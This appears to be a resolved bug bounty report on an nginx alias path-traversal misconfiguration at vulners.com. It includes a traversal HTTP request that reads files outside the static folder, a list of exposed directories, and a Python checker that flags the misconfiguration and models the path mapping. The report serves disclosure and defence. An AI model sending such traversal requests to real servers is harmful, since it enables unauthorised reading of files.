[vulners.com] nginx alias_traversal
Medium
Vulnerability Details
Incorrect configuration of alias could allow an attacker to read files stored outside the target folder.
https://github.com/yandex/gixy/blob/master/docs/en/plugins/aliastraversal.md
The vulnerability is only in the http configuration; it is not present on https.
Example:
```http
GET /static../monit/COPYING HTTP/1.1
Host: vulners.com
```
Examples of directories that I discovered:
```
rh/
nginx/cache/
monit/bin/monit
monit/conf/
monit/man/
monit/COPYING
monit/CHANGES
```
## Impact
Incorrect configuration of alias could allow an attacker to read files stored outside the target folder.
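An added illustration, not part of the original report and not gixy's code: a simplified Python check for the misconfiguration class described above (a prefix `location` without a trailing slash whose `alias` ends in one), together with a model of how nginx's prefix substitution maps the request shown in the report. The configuration and the `/opt/app` paths are constructed placeholders, since the actual server configuration is not on the page.

```python
import posixpath
import re

# Constructed sample config; the /opt/app paths are placeholders, not from the report.
SAMPLE_CONF = """
server {
    listen 80;
    location /static {
        alias /opt/app/static/;
    }
    location /media/ {
        alias /opt/app/media/;
    }
}
"""

# Simplified parsing: plain prefix locations only, no nested blocks.
LOCATION_RE = re.compile(
    r"location\s+(?:\^~\s+)?(?P<prefix>/[^\s{]*)\s*\{(?P<body>[^{}]*)\}")
ALIAS_RE = re.compile(r"\balias\s+(?P<target>[^;\s]+)\s*;")


def find_alias_traversal(conf):
    """Return (location, alias) pairs where the location lacks a trailing
    slash but the alias has one, so '<location>../' reaches the parent."""
    findings = []
    for loc in LOCATION_RE.finditer(conf):
        alias = ALIAS_RE.search(loc.group("body"))
        if alias is None:
            continue
        prefix, target = loc.group("prefix"), alias.group("target")
        if not prefix.endswith("/") and target.endswith("/"):
            findings.append((prefix, target))
    return findings


def resolve_alias(prefix, target, uri):
    """Model nginx prefix substitution: the matched location prefix is
    replaced by the alias value. Returns None if the location does not match."""
    if not uri.startswith(prefix):
        return None
    # 'static..' is an ordinary segment in the URI, so it survives URI
    # normalisation; '..' only becomes a parent reference after substitution.
    return posixpath.normpath(target + uri[len(prefix):])


if __name__ == "__main__":
    for prefix, target in find_alias_traversal(SAMPLE_CONF):
        print(f"location {prefix} -> alias {target}: add a trailing slash to the location")
    print(resolve_alias("/static", "/opt/app/static/", "/static../monit/COPYING"))
```

With the location written as `/static/`, the same request no longer matches the prefix, so the substitution never happens.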
Report Stats
- Report ID: 317201
- State: Closed
- Substate: resolved
- Upvotes: 14